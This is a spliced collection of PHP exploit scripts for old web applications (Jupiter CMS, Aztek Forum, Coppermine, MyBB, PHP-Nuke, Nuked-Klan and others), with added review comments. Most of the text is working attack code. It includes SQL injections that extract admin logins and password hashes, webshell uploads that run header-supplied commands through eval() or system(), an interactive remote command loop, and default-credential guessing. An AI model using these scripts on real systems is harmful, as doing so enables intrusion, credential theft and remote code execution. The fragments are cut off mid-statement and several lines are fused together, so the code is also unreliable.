/**
 * Entry point: reads the target and proxy options, then loops reading a
 * command from the prompt, sending it to the target and printing the part of
 * the response body that sits between two copies of a per-run separator.
 *
 * Depends on helpers defined elsewhere in the file: phpsploit (HTTP client),
 * head(), get_p(), cmd_prompt(), add_slashes(), to_char(). Their contracts
 * are assumed from usage only.
 *
 * Exits the process with status 1 the first time a response does not contain
 * the separator; otherwise returns once cmd_prompt() yields false.
 */
function main()
{
    // HTTP client with a browser-like User-Agent
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Banner (defined elsewhere)
    head();
    // Target base URL; the second argument presumably marks it as required -- see get_p()
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass
    $byp = "1');";
    // PHP code
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator: a per-run marker used only to locate the output inside the
    // response body, so rand() (not a CSPRNG) is adequate for that purpose.
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Prompt loop; cmd_prompt() returning false ends it
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Go =]
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Split the body on the separator; index 1 is what sits between the two markers
        $res = explode($s_sep, $web->getcontent());
        // No separator in the response: stop the whole script
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
# 82.  array_walk($_GET,'url_protect');
# 83.  extract($_GET, EXTR_OVERWRITE);
#
# 106. if (!empty($_COOKIE)) {
# 107. if (!$magicquotesGPC)
# 108. array_walk($_COOKIE,'addslashes_GPC');
# 109. reset($_COOKIE);
# 110. array_walk($_COOKIE,'url_protect');
# 111. extract($_COOKIE, EXTR_OVERWRITE);
#
# 132. if (!empty($_FILES)) {
# 133. while (list($key,$value)=each($_FILES)) {
# 134. $$key=$value['tmp_name'];
# 135. }
#
# One request carries the query; {$aid} and {$pwd} are interpolated here and
# are presumably assigned before this fragment (not visible). Note that the
# preg_match() calls below reuse the same two names as their output arrays.
$xpl->get($url . "print.php?_FILES[DB][tmp_name]=links_links%20union%20select%20-1,{$aid},{$pwd},1%20ORDER%20BY%20url%23&lid=1");
# Both marker pairs must be present in the body; the script dies otherwise.
if (preg_match("#BEGINUSR(.*)ENDUSR#", $xpl->getcontent(), $aid) and preg_match("#BEGINPWD(.*)ENDPWD#", $xpl->getcontent(), $pwd)) {
    print "\nAdmin_aid: {$aid['1']}\nAdmin_pwd: {$pwd['1']}";
} else {
    die("Exploit failed");
}
# +auth.inc.php (ADMIN AUTH)
# |
# 59. if ($admin!="") {
# 60.  $Xadmin = base64_decode($admin);
# 61.  $Xadmin = explode(":", $Xadmin);
# 62.  $aid = urlencode($Xadmin[0]);
# 63.  $AIpwd = $Xadmin[1];
# 64.  if ($aid=="" or $AIpwd=="") {
# 65.     Admin_Alert("Null Aid or Passwd");
# 66.  }
<?php

/*
Title:          Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt
*/
// Notices are masked; every other error level still reports.
error_reporting(E_ALL ^ E_NOTICE);
// NOTE(review): the literal has a leading space before "http://".
$url = ' http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
// Multipart form description. frmdt_url/frmdt_filename/frmdt_type/frmdt_content
// are bare constants expected to come from the phpsploit class (not visible
// here); an undefined constant is a fatal Error on PHP 8.
$arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>"));
// Submit the form, then fetch the resulting path and echo the response body.
$xpl->formdata($arr);
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 |
 +-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =).
*/
// Positional CLI arguments: target URL, then optional proxy host and proxy
// credentials. There is no usage check; a missing index only raises a notice.
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
$xpl = new phpsploit();
if (!empty($prs)) {
    $xpl->proxy($prs);
}
if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
print "\nheader>  Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
// getcontent() receives the return value of get() here, while elsewhere on
// this page it is called with no argument; presumably the argument is ignored
// -- confirm against the phpsploit class.
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
    print "\nsploit> Owner -> " . $matches[1];
} else {
    die("\nsploit> Exploit failed");
}
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
// Names suggest cookie persistence and redirect following are switched on
// for the registration flow (class not shown).
$xpl->cookiejar(1);
$xpl->allowredirection(1);
// Throwaway account: the same value serves as login, password and e-mail local part.
$name = "phpsploit" . rand();
$xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on");
print "\nsploit> Login/Password -> {$name}";
print "\nstatus> Trying to get database informations";
$xpl->get($url . "forum.php?fid=XD");
if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) {
    print "\nsploit> Full Path Disclosure -> " . $matches[1];
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
// $pxs / $pxa (proxy host, proxy credentials) are assigned outside this fragment.
if (!empty($pxs)) {
    print "\nstatus> Using a proxy {$pxs}";
    $xpl->proxy($pxs);
}
if (!empty($pxa)) {
    print "\nstatus> Basic proxy authentification {$pxa}";
    $xpl->proxyauth($pxa);
}
/*/
 Table prefix: derived from the version string found in include/index.html
 (dots removed), falling back to the 1.4.10 name when no version is found.
/*/
print "\nstatus> Searching the version";
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
    print "\nsploit> Coppermine version " . $matches[1];
} else {
    print "\nsploit> Not found";
}
$table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users';
/*/
 If you have the admin cookie (but not the password),
 replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
// $adu / $adp (admin credentials) are assigned outside this fragment.
print "\nstatus> Trying to get logged in";
$xpl->post($url . "login.php?referer=index.php", "username={$adu}&password={$adp}&remember_me=1&submitted=Se+Connecter");
if (!preg_match("#color:red#", $xpl->getcontent())) {
    print "\nsploit> Done";
} else {
 *
 * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
 * What we want is not in the database, it's in a file (config.php):
 *
 * //this are the logins for the admin part. Change them for security.
 * $login = "******";  //your login for the admin section.
 * $pass = "******";   //your login for the admin section.
 *
 * PS: Les chr() ont été utilisés dans le but de se foutre de
 * la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =).
 *
 */
// Regex pattern assembled one byte at a time with chr() (see the author's
// note above); it is the pattern argument of a preg_replace() call below.
$header = chr(0x2f) . chr(0x3c) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x68) . chr(0x65) . chr(0x61) . chr(0x64) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x74) . chr(0x69) . chr(0x74) . chr(0x6c) . chr(0x65) . chr(0x3e) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x66) . chr(0x72) . chr(0x61) . chr(0x6d) . chr(0x65) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x74) . chr(0x69) . chr(0x74) . chr(0x6c) . chr(0x65) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x6c) . chr(0x69) . chr(0x6e) . chr(0x6b) . chr(0x20) . chr(0x68) . chr(0x72) . chr(0x65) . chr(0x66) . chr(0x3d) . chr(0x22) . chr(0x5c) . chr(0x2f) . chr(0x73) . chr(0x74) . chr(0x79) . chr(0x6c) . chr(0x65) . chr(0x2e) . chr(0x63) . chr(0x73) . chr(0x73) . chr(0x22) . chr(0x20) . chr(0x72) . chr(0x65) . chr(0x6c) . chr(0x3d) . chr(0x22) . chr(0x73) . chr(0x74) . chr(0x79) . chr(0x6c) . chr(0x65) . chr(0x73) . chr(0x68) . chr(0x65) . chr(0x65) . chr(0x74) . chr(0x22) . chr(0x20) . chr(0x74) . chr(0x79) . chr(0x70) . chr(0x65) . chr(0x3d) . chr(0x22) . chr(0x74) . chr(0x65) . chr(0x78) . chr(0x74) . chr(0x5c) . chr(0x2f) . chr(0x63) . chr(0x73) . chr(0x73) . chr(0x22) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x6d) . chr(0x65) . chr(0x74) . chr(0x61) . chr(0x20) . chr(0x68) . chr(0x74) . chr(0x74) . chr(0x70) . chr(0x2d) . chr(0x65) . chr(0x71) . chr(0x75) . chr(0x69) . chr(0x76) . chr(0x3d) . chr(0x22) . chr(0x43) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x2d) . chr(0x54) . chr(0x79) . chr(0x70) . chr(0x65) . chr(0x22) . chr(0x20) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x74) . chr(0x65) . chr(0x6e) . chr(0x74) . chr(0x3d) . chr(0x22) . chr(0x74) . chr(0x65) . chr(0x78) . chr(0x74) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3b) . chr(0x20) . chr(0x63) . chr(0x68) . chr(0x61) . chr(0x72) . chr(0x73) . 
chr(0x65) . chr(0x74) . chr(0x3d) . chr(0x69) . chr(0x73) . chr(0x6f) . chr(0x2d) . chr(0x38) . chr(0x38) . chr(0x35) . chr(0x39) . chr(0x2d) . chr(0x31) . chr(0x22) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x65) . chr(0x61) . chr(0x64) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x62) . chr(0x6f) . chr(0x64) . chr(0x79) . chr(0x3e) . chr(0x2f);
// Query string for the request, also assembled with chr(); concatcharfu()
// (defined below) encodes $file, which is assigned outside this fragment.
$sql = chr(0x70) . chr(0x61) . chr(0x67) . chr(0x65) . chr(0x2e) . chr(0x70) . chr(0x68) . chr(0x70) . chr(0x3f) . chr(0x69) . chr(0x64) . chr(0x3d) . chr(0x2d) . chr(0x31) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x75) . chr(0x6e) . chr(0x69) . chr(0x6f) . chr(0x6e) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x73) . chr(0x65) . chr(0x6c) . chr(0x65) . chr(0x63) . chr(0x74) . chr(0x2f) . chr(0x2a) . chr(0x2a) . chr(0x2f) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6c) . chr(0x6f) . chr(0x61) . chr(0x64) . chr(0x5f) . chr(0x66) . chr(0x69) . chr(0x6c) . chr(0x65) . chr(0x28) . chr(0x63) . chr(0x6f) . chr(0x6e) . chr(0x63) . chr(0x61) . chr(0x74) . chr(0x28) . concatcharfu($file) . chr(0x29) . chr(0x29) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c) . chr(0x2c) . chr(0x6e) . chr(0x75) . chr(0x6c) . chr(0x6c);
// Second pattern, built the same way as $header.
$footer = chr(0x2f) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x62) . chr(0x6f) . chr(0x64) . chr(0x79) . chr(0x3e) . chr(0xd) . chr(0xa) . chr(0x3c) . chr(0x5c) . chr(0x2f) . chr(0x68) . chr(0x74) . chr(0x6d) . chr(0x6c) . chr(0x3e) . chr(0x2f);
$xpl->get($url . $sql);
// Strip whatever the two patterns match from the response body, then print the rest.
$ct = preg_replace($footer, '', $xpl->getcontent());
print preg_replace($header, '', $ct);
/**
 * Render every byte of $file as a comma-separated list of char(N) terms.
 *
 * @param string $file Bytes to encode; each byte becomes one "char(N)" term.
 * @return string The joined terms, e.g. "char(97),char(98)"; empty for "".
 */
function concatcharfu($file)
{
    // strlen() is evaluated once rather than on every iteration
    $length = strlen($file);
    $terms = array();
    for ($pos = 0; $pos < $length; $pos++) {
        $terms[] = 'char(' . ord($file[$pos]) . ')';
    }
    // implode() inserts the separator only between terms, matching the
    // original "no trailing comma" behaviour
    return implode(',', $terms);
}
class phpsploit
{
    $xpl->proxyauth($pra);
}
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote); $cod is assigned outside this fragment
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
print "\n0x05>Now enter your commands";
// NOTE(review): $cmd is read in the body before the loop condition assigns
// it, so the first iteration runs with $cmd unset. eregi() no longer exists
// in PHP 7+.
do {
    $xpl->addheader('Shell', "@system({$cmd});");
    $xpl->get($url . 'dirsys/config.inc.php');
    print $xpl->getcontent() . "\n0x06>";
} while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN))));
// Functions declared after this point are still hoisted by PHP
exit(0);
function getparam($param, $opt = '')
{
    global $argv;
    foreach ($argv as $value => $key) {
        if ($key == '-' . $param) {
            return $argv[$value + 1];
        }
    }
    if ($opt) {
        usage();
    } else {
        return FALSE;
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# I decided to use the solution number 2.
# We can also add an administrator (easily) ... but it's not interesting.
#
# sql_inject() is defined elsewhere in the file; from the labels printed
# without a trailing newline it presumably reports progress inline and
# returns the recovered value -- confirm against its definition.
print "\nAdmin IP : ";
$ip = sql_inject('ip');
print "\nAdmin sid: ";
$sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";
# Client-IP header plus the session id, as described in the note above
$xpl->addheader('Client-IP', $ip);
$xpl->get($url . "admin/languages.php?adminsid={$sid}");
# Trying to find the language; default to english when the hidden field is absent
if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) {
    $lang = $langmatches[1];
} else {
    $lang = 'english';
}
print "\nLanguage: {$lang}";
# Language configuration; $filetoed is assigned outside this fragment
$xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}");
# Collect every textarea name/content pair from the edit form
preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value);
# We can't use:
# - <? OR <?php
# - <script language="php">
# - ' OR "
#
}
# +nukesentinel.php
# 49.  if($ab_config['disable_switch'] > 0) { return; }
# 414. if($ab_config['track_active'] == 1 AND !is_excluded($nsnst_const['remote_ip'])) {
# 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, `username`, `date`, `ip_addr`, `ip_long`, `page`,
#                     `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`, `remote_port`, `request_method`,
#                     `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
#                     '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
#                     '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
#                     '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')");
#
# We insert a row in $prefix."_nsnst_tracked_ips".
#
# $prfix is not assigned in this fragment -- possibly a typo for $prefix;
# it only affects the printed label.
print "\nInserting a row in {$prfix}_nsnst_tracked_ips";
# The Client-IP header presumably feeds $nsnst_const['client_ip'] in the
# INSERT quoted above.
$xpl->addheader("Client-IP", "255.255.255.255");
$xpl->get($url . 'index.php');
# Trying to find a valid tid.
# Needed for $tum > 0.
#
print "\nTrying to find a valid tid (max hits={$nbtst})";
$sql = "' OR 1=1#";
# admin cookie: base64 of "<value>:1:"; the expected layout comes from the
# target's cookie handling, which is not shown here.
$xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:')));
for ($c = $tid; $c <= $nbtst; $c++) {
    $xpl->get($url . "includes/nsbypass.php?tid={$c}");
    if (!preg_match("#phpnuke.org#", $xpl->getheader())) {
        $tid = $c;
        print "\nValid tid found: {$tid}\nHash: {$login} -> ";
        break;
    }
    if ($c == $nbtst) {
        exit("\n#1 Exploit failed");
/* Code in the fake avatar: two variants, selected by $mode (assigned outside this fragment) */
if ($mode == 0) {
    $file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
    /* single quotes inside $file_upload_code are escaped so it survives being embedded in a quoted literal */
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}
/* Upload avatar with PHP c0de. frmdt_* are bare constants expected from the
   phpsploit class (not visible here); undefined constants are fatal on PHP 8. */
print " * uploading avatar\t";
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
/* formdata()'s return value is used directly as the preg_match() subject */
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
    print "done\n";
} else {
    die("error\n");
}
/* The stored avatar path is read back from the player page */
if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) {
    $img = $match[1];
} else {
    die(" * can't find image name\n");
}
/* Change homepage to our avatar, with a null byte, after saving website name. */
print " * changing homepage\t";
preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all);
/* NOTE(review): this line is garbled in the listing -- the $postdata literal,
   the post() call and the trailing print were fused -- so it will not parse as-is. */
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
$success = true;
if ($mode == 0) {
    print " * loading uploader\t";
    $xpl->addheader("upload", "1");
    if (preg_match("#upfiledone#i", $xpl->get($url))) {
    print "\n";
} else {
    /* --- ATTACK #1: LOGIN GUESSING --- */
    /* attack() is defined elsewhere; a return value of 1 is treated as success and ends the script */
    print "[*] Attack #1\n";
    $default = array(array("*****@*****.**", "admin"), array("*****@*****.**", "cinema"));
    for ($i = 0; $i < sizeof($default); $i++) {
        print "[*] Trying with " . $default[$i][0] . ":" . $default[$i][1];
        if (attack($default[$i][0], $default[$i][1]) == 1) {
            exit;
        }
    }
    print "[*] Attack failed.\n\n";
    /* --- ATTACK #2: MAGIC_QUOTES_GPC --- */
    print "[*] Attack #2\n";
    print "[*] magic_quotes_gpc=";
    $c = $xpl->get($url . "phpinfo.php");
    /* $b is only assigned when the regex matches; the condition below reads $b[1] regardless */
    if ($c && preg_match('#<tr><td class="e">magic_quotes_gpc</td><td class="v">([^<]+)</td>#i', $c, $b)) {
        print "{$b['1']}\n";
    } else {
        print "?\n";
    }
    /* NOTE(review): "&& false" makes this branch unreachable -- looks like a deliberate switch-off, confirm */
    if ($b[1] != "On" && false) {
        attack("'%20OR%20(priv=%27admin%27%20AND%201=1)%20/*", 'hell0');
        if ($b[1] == "Off") {
            exit;
        }
    } else {
        print "[*] Attack failed.\n\n";
    }
    /* --- ATTACK #3: SQL INJECTION --- */
    print "[*] Attack #3\n";
        if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
            # User Cookies
            $xpl->addcookie("{$prefix}sess_id", $sid[1]);
            $xpl->addcookie("{$prefix}user_id", $uid[1]);
        } else {
            exit("[*] Can't log in\n");
        }
    }
    # Label/query pairs; built here but not read within this fragment.
    # The first query uses {$prefix}; the other three hard-code "nuked_".
    $queries = array();
    $queries[] = array("     SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1");
    $queries[] = array("     UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $queries[] = array("   Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    # Browser-like User-Agent and a loopback X-Forwarded-For for the Stats request
    $xpl->agent("Mozilla Firefox");
    $xpl->addheader("X-Forwarded-For", "127.0.0.1");
    $ctmp = $xpl->get($url . "index.php?file=Stats&page=visits");
    # Two fatal cases: no rights on the Stats page, or not logged in at all
    if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) {
        exit("[*] You don't have rights to access Stats page.\n");
    }
    if (preg_match('#<a href="index.php\\?file=User&amp;op=login_screen">[^<]+</a> | <a href="index.php\\?file=User&amp;op=reg_screen">[^<]+</a>#i', $ctmp)) {
        exit("[*] You must be registered, use -user param.\n");
    }
    # Drop the custom headers before the attack functions (defined elsewhere) run
    $xpl->reset("header");
    $xpl->agent("Mozilla Firefox");
    attack1();
    attack2();
}
function getparam($param, $opt = '')
{
    global $argv;
    foreach ($argv as $value => $key) {
 | ... if (isset($_GET['lang']) && $_GET['lang'] && file_exists($chem_absolu."languages/".$_GET['lang'].".".$alex_livre_ext))
 | $f_language = str_replace("..","",$_GET['lang']); // We can't use .... because of file_exists() verification but ... =]
 | include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
 |
 |
 |  index.php -> SQL Injection
 |  =========
 |  ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'");
 |  // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre`
 |
/*/
// NOTE(review): this line is garbled in the listing -- the $sql literal, the
// request and the preg_match() condition were fused -- so it will not parse as-is.
$sql = "index.php?lang=english.php%00'%20union%20select%20" . "concat('XPLLogin:'******'XPLPass:'******'#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#', $xpl->getcontent(), $count)) {
    print "\nsploit> AdminUsername::" . $count[1] . "\nsploit> AdminPassword::" . $count[2];
} else {
    die("\nsploit> Exploit failed");
}
print "\nstatus> Trying to get logged in";
// NOTE(review): the credential values in this literal are redacted ("******") in the listing.
$xpl->post($url . "admin/index.php", "f_login="******"&f_pass="******"&f_identif=Identification");
// A 32-hex f_sid in the response headers is taken as a successful login
if (preg_match("#f_cadres\\.php\\?f_sid=([a-z0-9]{32})#", $xpl->getheader(), $sid)) {
    print "\nsploit> Done";
} else {
    die("\nsploit> Exploit failed");
}
print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755)
$xpl->post($url . "admin/skins.php?f_sid=" . $sid[1], "aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter");
<?php

/*
Title:          Jupiter CMS 1.1.5 SQL Injection Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt
*/
// Notices are masked; every other error level still reports.
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
// Marker-wrapped query carried in the Client-IP header of a single request
$hev = "-1' UNION SELECT CONCAT('" . "[BEGIN_XPL_USER]'," . "(SELECT username FROM users LIMIT 0,1),'" . "[END_XPL_USER]','" . "[BEGIN_XPL_PWD]'," . "(SELECT password FROM users LIMIT 0,1),'" . "[END_XPL_PWD]'),1 #";
$xpl->addheader("Client-IP", $hev);
$xpl->get($url);
// NOTE(review): neither match result is checked; when the markers are absent
// $usr[1]/$pwd[1] raise a (masked) notice and the output is just "::".
preg_match("#\\[BEGIN_XPL_USER\\](.*)\\[END_XPL_USER\\]#", $xpl->getcontent(), $usr);
preg_match("#\\[BEGIN_XPL_PWD\\]([a-z0-9]{32})\\[END_XPL_PWD\\]#", $xpl->getcontent(), $pwd);
print $usr[1] . '::' . $pwd[1];
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
# $config[0] (table prefix) and $config[1] (cookie prefix) are appended
# before this fragment; from their usage below: "{$config[0]}_users" and
# "{$config[1]}_admin_session".
$config[] = 'ORDER by date LIMIT 1'; # $config[2]: sql conditions, appended after "<prefix>_users"
$config[] = 'HAK'; # $config[3]: match marker, length <= 3, wraps each value and is matched by the regex below
# $config[4]: PHP code (not used within this fragment)
